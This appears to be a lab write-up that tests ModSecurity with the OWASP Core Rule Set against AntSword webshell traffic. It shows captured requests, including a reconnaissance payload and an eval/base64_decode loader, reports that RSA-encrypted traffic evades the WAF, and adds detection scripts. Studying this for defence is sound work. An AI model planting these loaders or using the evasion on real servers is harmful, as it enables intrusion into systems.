2025-01-19 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com)05/31 Report--
This article looks at how well a WAF detects WebShell traffic, working through plaintext, Base64/rot13-encoded and RSA-encrypted AntSword connections against ModSecurity with the OWASP Core Rule Set. I hope it is useful to anyone who needs it.
Local environment building
From the screenshot I kept, the target's PHP version is 5.6.40, so I will build an Apache + PHP 5.6.40 test environment. Open VirtualBox, clone a CentOS image, and configure it as follows.
1. Install Apache
yum install -y httpd
httpd -v
Server version: Apache/2.4.6 (CentOS)
Server built:   Aug 8 2019 11:41:18
2. Install PHP 5.6
yum -y install epel-release
rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y install php56w php56w-mysql php56w-gd libjpeg* php56w-ldap php56w-odbc php56w-pear php56w-xml php56w-xmlrpc php56w-mbstring php56w-bcmath
yum -y install httpd php-gd56w php-intl56w php-mysql56w mod_ssl openssl mcrypt php5-mcrypt56w
yum -y install php56w-mcrypt php56w-soap php56w-intl php56w-pdo
systemctl restart httpd.service
php -v
PHP 5.6.40 (cli) (built: Jan 12 2019 13:11:15)
Copyright (c) 1997-2016 The PHP Group
Create an index.php that displays phpinfo() and, for convenience when accessing the machine during testing, stop firewalld.
systemctl stop firewalld   # alternatively, open just the required port with firewall-cmd
3. To inspect the attack traffic later, install Wireshark; the wildcard pulls in wireshark-gnome and the other subpackages in one go.
yum install wireshark*
4. Configure Apache with ModSecurity. No WAF appliance is available to test the traffic against, so the test uses ModSecurity together with the OWASP (Open Web Application Security Project) Core Rule Set, CRS. The result is less direct than a real deployment, but it is illustrative enough.
yum -y install mod_security
cd /etc/httpd
git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git
mv owasp-modsecurity-crs modsecurity.d
cd modsecurity-crs
cp crs-setup.conf.example crs-setup.conf
vi /etc/httpd/conf/httpd.conf   # add the following Include lines
Include conf.modules.d/*.conf
Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf
Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf
systemctl restart httpd
By default ModSecurity blocks a request as soon as it detects an attack; change SecRuleEngine to DetectionOnly so that it only logs.
vim /etc/httpd/conf.d/mod_security.conf
SecRuleEngine On               # intercept (the default)
SecRuleEngine DetectionOnly    # log only
tail -f /var/log/httpd/model/modsec_audit.log   # watch the audit log
Sending a few test attack vectors produces entries in the log, which confirms the configuration. The environment is ready.
Plaintext PHP WebShell: configuration, traffic analysis and detection
First, write a one-line webshell so that plaintext webshell traffic can be observed.
vim test1.php
Configure AntSword to connect to it.
Plaintext traffic analysis
Use Wireshark to view the traffic of the test connection:
POST /test1.php HTTP/1.1
Host: 192.168.1.13
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 993
Connection: close

aaaa=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) { return $out; };
function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "620e2fc";
    echo @asenc($output);
    echo "71a0ccfbc1";
}
ob_start();
try {
    // dirname() returns the directory part of a path; the $_SERVER['SCRIPT_FILENAME'] predefined variable is the full path of the currently executing script
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    // fallback: PATH_TRANSLATED is the filesystem path of the current script (not the document root), i.e. the result after the server maps the virtual path to the real one; Apache 2 users can set AcceptPathInfo On in httpd.conf to define PATH_INFO
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}\t";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= "\t";   // the above tells Windows drive letters from a Linux root and stores the directory information in $R
    // posix_getegid() returns the effective group ID of the current process, posix_geteuid() its effective user ID
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();   // get_current_user() returns the owner of the current PHP script
    $R .= php_uname();   // php_uname() returns information about the system PHP is running on
    $R .= "\t{$s}";
    echo $R;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

HTTP/1.1 200 OK
Date: Wed, 29 Jan 2020 12:53:30 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 136
Connection: close
Content-Type: text/html; charset=UTF-8

620e2fc/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache71a0ccfbc1
To understand the packet AntSword sends, I went through it carefully and looked up the related functions. Annotating it brought home how powerful these PHP functions are, which made me curious enough to test them locally.
Base64 && rot13 traffic analysis

POST /php_assert_script.php HTTP/1.1
Host: 192.168.1.13
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 942
Connection: close

ant=%40eval(%40base64_decode(%24_POST%5Bq9c4fa426fb243%5D))%3B&q9c4fa426fb243=...%3D%3D
Once the payload is Base64-encoded, the traffic no longer exposes the many high-risk function names of the plaintext version; apart from eval, nothing is visible. We run the detection test again with encoding enabled.
Base64 && rot13 webshell traffic detection
The WAF test results are as follows:
Message: Warning. Pattern match "^[\\d.]+$" at REQUEST_HEADERS:Host. [file
Message: Warning. Matched phrase "base64_decode" at ARGS:ant. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "301"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: base64_decode found within ARGS:ant: @eval(@base64_decode($_post[431d0730c]))"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"]
The statistics are as follows (Apache-Error | Message | number of matching rules | level): 77143
Configure rot13 through the AntSword interface and capture the packet; the only difference from the Base64 traffic is that the base64_decode call becomes str_rot13:
ant=%40eval(%40base64_decode  ->  ant=%40eval(%40str_rot13(
The intercepted data looks much like the Base64 case, and the WAF statistics are as follows (Apache-Error | Message | number of matching rules | level): 107143
So eval combined with a reversible encoding such as base64 or rot13 (symmetric in the sense that one transform both encodes and decodes) still triggers high alarm levels, though roughly half as many alarms as plaintext transmission. The author therefore goes on to try the asymmetric encryption that AntSword provides.
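The CRS hits above come from matching function names in the url-decoded request. The following Python scanner is an added example (not code from the article or from AntSword) that reproduces that idea and then also peels the base64 and rot13 layers off each parameter, so the functions hidden inside the encoded payload become visible again; the request bodies and the list of high-risk names are constructed for the example.

```python
import base64
import codecs
import re
from urllib.parse import parse_qs, quote

# Constructed subset of the high-risk PHP function names that CRS rule 933150 looks for.
HIGH_RISK = {"eval", "assert", "base64_decode", "str_rot13", "posix_getpwuid",
             "posix_geteuid", "get_current_user", "php_uname", "ini_set", "set_time_limit"}
CALL_RE = re.compile(r"\b([a-z0-9_]+)\s*\(", re.I)   # identifier followed by '('


def functions_in(text):
    """Return the high-risk function names that are called in `text`."""
    return {m.lower() for m in CALL_RE.findall(text)} & HIGH_RISK


def decode_layers(value):
    """Yield the raw value, then its base64 and rot13 readings (the two encoders tested above)."""
    yield value
    try:
        yield base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except Exception:
        pass   # not valid base64, skip that layer
    yield codecs.decode(value, "rot13")


def scan_body(body):
    """Map each POST parameter to the risky functions visible after url-decoding and one decoding layer."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        found = set()
        for value in values:
            for layer in decode_layers(value):
                found |= functions_in(layer)
        if found:
            hits[name] = found
    return hits


# Constructed request bodies modelled on the three captures above, with a shortened payload.
PAYLOAD = '@ini_set("display_errors","0");@set_time_limit(0);$R=php_uname();echo $R;'
PLAINTEXT_BODY = "aaaa=" + quote(PAYLOAD, safe="")
BASE64_BODY = ("ant=" + quote("@eval(@base64_decode($_POST[q9c4]));", safe="")
               + "&q9c4=" + quote(base64.b64encode(PAYLOAD.encode()).decode(), safe=""))
ROT13_BODY = ("ant=" + quote("@eval(@str_rot13($_POST[q9c4]));", safe="")
              + "&q9c4=" + quote(codecs.encode(PAYLOAD, "rot13"), safe=""))

if __name__ == "__main__":
    for label, body in (("plaintext", PLAINTEXT_BODY), ("base64", BASE64_BODY), ("rot13", ROT13_BODY)):
        print(label, scan_body(body))
```

Without the decoding step the encoded bodies expose only eval plus the decoder name, which is exactly the reduced hit count the statistics above show.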
RSA encrypted traffic configuration
Since version >= 2.1.0 the AntSword author has added an RSA mode. AntSword supports it only for PHP by default, and the server must have the php_openssl extension enabled.
Edit php.ini, uncomment extension=php_openssl.dll (on Linux the module is openssl.so), and restart Apache.
How to use it:
AntSword -> System Settings -> Encoding Management -> New Encoder -> PHP RSA -> name it rsa_php -> click RSA configuration -> Generate
1. Copy the PHP code generated in that dialog to the virtual machine and save it as rsa.php.
2. In the AntSword connection settings, select the rsa_php encoder.
3. Test the connection.
Analysis of RSA encrypted traffic
The traffic captured by Wireshark:
POST /rsa.php HTTP/1.1
Host: 192.168.1.13
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1712
Connection: close

Ant=W%2B9beN7Ltke390bzZGS5JbOBCnO8SRXW6Z8w0WaMF6CdAymaCu6NeWE9FX0kyCFs3jaLkDWkEvcTsSC2gEu85l5ugsVJUK6bTWFlVNeRBoezjTjUJZdjGvnjrxjd5Pn4iZaRjoaxAZPeZP2ozupbevWFUId4ZzkKZ7bIVPrZKk4%3D%7CYjt1kz5Gkj2N6Ajkqp3VXcg%2FEA7emPXV6oyTwZAZS9Ux1%2Fpby5PIuU9LsMZmGlMqGXvRFO23is9MUJpF66yboIAIYqpGRJCDgSP4S%2BfG6DD0lRYGEOIEsfpaLSVMhxZtR6OnFXp%2FfbXqmgGUk0a8HCUfQ83XmXS%2BRsl0Yx2PFc4%3D%7CAWtIrpychlQENib6basrK89LJcjnKk%2Bf5mVM72MOnPHxaviQFXws2TKNdGPI4SI9%2Fkwl%2FUGqB22s6NOwCza1f%2BkzGK7FqEciITMZMNFbokFsmjG8IiWkRO%2B%2BbWWnsMesfavJub9aEln41x8U97WjgKGKMMdqXZHrIRS4KU8pQhU%3D%7CXLL0DnlWOLx3hNXd2VGzmbdcgmtQoiyiiPNQCiBkAbUK1mLM14l6f22Pkl2tSSw%2F9dYIkdZ91wUok9GHDBMmKkL6D%2BJGQxrJDyQXEfytOzfzZmKqp%2BJ%2BryVm2zwLJMXTdpZ%2BUsBWgVzlD%2Bxga6%2F7rCqkG%2FtaWM6e%2BGegcS4lWTE%3D%7CJGJR50q4jSkL028qffvT%2Be%2BnJcMQth7jz86sntyuI3GZQUtjS5%2FoCByIqsGi8zPwCKS0J%2FAEiEGhAwN7%2FBQXYjyVWAs5VpDhPrVUs7EbqFgllVmrNt8T5Rt7O%2FCHVSiR2AQjyG%2BxB1LjO5ElX%2FH8Pfh35dDpVaFt3MEr1lxT69I%3D%7CSIirF52ZEhs%2FMBfco2kWouurB%2F%2FhCvLG29%2BK70a6t8Io%2FE%2F7VL5IO38s2j%2Bjq%2BSw6dUDL9cEUbEx2G2U4r0fHiDSYPbbn9WS6FbQSCPHxG6lxLHCXmmkKxj%2B2P8khyMM%2FHdVCWai%2B5L5hXYr%2BUWFkCkbv%2BUyYUSsfL29sGxWeVA%3D%7Ci1qZBSL6Dfu31cisSj3J%2BY7epLuQl62DdEWMCiZRQOz5AHFsPFsWtO59uedRC0CfMOhcbIDGGq2GNThL8VPz%2FUfLJTd3kuoFo7p225iPcYOKJS75V36ccHw3bMI3LOWcEhUF3LPX2YcaLSvwDDyHfrnWL2Qj6VmQKew8edoAIdU%3D%7CkJih4pPT70J6BiPll9o4PtH%2Byl% 2BmB8%2BUPDAS%2FfAu4uzi2yDMCIdzdkaFLlnsUKewHXLf1mWWVpGkfqLCttgZed9wUtl6N22C3nQGZqZ%2FqnNiKeBYK0%2FJBmimOAf7nSMB1WF%2Bab5RmRq6cSSwrWc4ya93kVJzmIg1BdyaiycdN5I%3D%7CHV2y7vs6wQUIQ8DnvveCeD8xtjRecf%2F%2B7rAl7Y4Wa8S4Y0onKYHOz2Nz0hgBJtFN%2BLRIj9%2B%2FYyOq%2Fslq0XW%2BolQCUl5hf8%2F3Y9OmlxKvSCGf3A0IIAquqSaJXpU4w8rqVyP9Od2bgDXDzsOx8YgVdigeyZxLS0TNNODTGIATb7Y%3DHTTP/1.1 200 OK
Date: Thu, 30 Jan 2020 05:47:09 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 133
Connection: close
Content-Type: text/html; charset=UTF-8

8ee773/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache47970246
After asymmetric encryption, nothing in the transmitted data can be distinguished by eye except its length. The author is satisfied with this result.
RSA encrypted traffic detection

Message: Warning. Pattern match "^[\\d.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Apache-Handler: php5-script
Stopwatch: 1580363229118571 7666 (-)
Stopwatch3: 1580363229118571 7666; combined=6153, p114474, p21405170, p34039, p400156, p500213, sr=205, sw=1, lumb0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0.
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Engine-Mode: "DETECTION_ONLY"

| Apache-Error | Message | Number of matching rules | Level |
|---|---|---|---|
| 1 | 1 | 1 | - |
The WAF only detects that the Host header is a numeric IP address, which means it offers essentially no protection against RSA-encrypted webshell traffic; further testing against security devices could only rely on antivirus software.
This degree of encryption is enough for the author's purposes in this experiment, but many problems remain, such as evading antivirus software and obfuscating code; each direction needs focused, careful, long-term investment.
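Two checks a defender can still run against the RSA traffic, as an added example rather than code from the article: the request body's only visible feature is its length, and on this page it is a chain of equal-length base64 blocks (172 characters each, i.e. 128-byte RSA-1024 blocks, joined by %7C), while the reply body in the capture above is still plaintext in the marker + path + php_uname() shape. The regexes and block sizes are assumptions drawn from the two captures, and the request sample uses random bytes in place of ciphertext.

```python
import base64
import os
import re
from urllib.parse import parse_qs, quote

RSA_BLOCK_SIZES = {128, 256, 512}   # ciphertext block length in bytes for 1024/2048/4096-bit keys
# php_uname() output opens with OS name, host name and kernel release (see the replies above).
UNAME_RE = re.compile(r"(Linux|Windows NT|Darwin|FreeBSD) \S+ \S+")
# Reply shape in both captures: hex marker, absolute path, then three tab-separated fields.
INFO_RE = re.compile(r"^[0-9a-f]{4,16}(?:/|[A-Za-z]:\\)[^\t]*\t[^\t]*\t[^\t]*\t")


def rsa_block_size(value):
    """Block length if `value` is two or more '|'-joined base64 blocks of one RSA-sized length, else 0."""
    chunks = value.split("|")
    if len(chunks) < 2:
        return 0
    sizes = set()
    for chunk in chunks:
        try:
            sizes.add(len(base64.b64decode(chunk, validate=True)))
        except Exception:
            return 0   # a chunk is not base64, so this is not a chain of ciphertext blocks
    return sizes.pop() if len(sizes) == 1 and sizes <= RSA_BLOCK_SIZES else 0


def opaque_params(body):
    """Map POST parameter -> block size for every parameter that looks like chained RSA blocks."""
    found = {}
    for name, values in parse_qs(body).items():
        size = max(rsa_block_size(v) for v in values)
        if size:
            found[name] = size
    return found


def reply_leaks_host_info(body):
    """True when a reply still has the plaintext info shape: marker, path and php_uname() output."""
    return bool(INFO_RE.match(body) and UNAME_RE.search(body))


# Constructed request: ten random 128-byte blocks stand in for the RSA-1024 ciphertext chunks.
RSA_BODY = "ant=" + quote("|".join(base64.b64encode(os.urandom(128)).decode() for _ in range(10)), safe="")
# Reply body from the RSA capture above, with the tabs that Wireshark rendered as dots restored.
LEAKED_REPLY = ("8ee773/var/www/html\t/\tLinux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 "
                "#1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64\tapache47970246")

if __name__ == "__main__":
    print(opaque_params(RSA_BODY), reply_leaks_host_info(LEAKED_REPLY))
```

Neither check decrypts anything; they flag the request by its block structure and the reply by the host information it still carries in clear, which is where a response-side rule or endpoint tooling picks up what the request-side CRS rules miss.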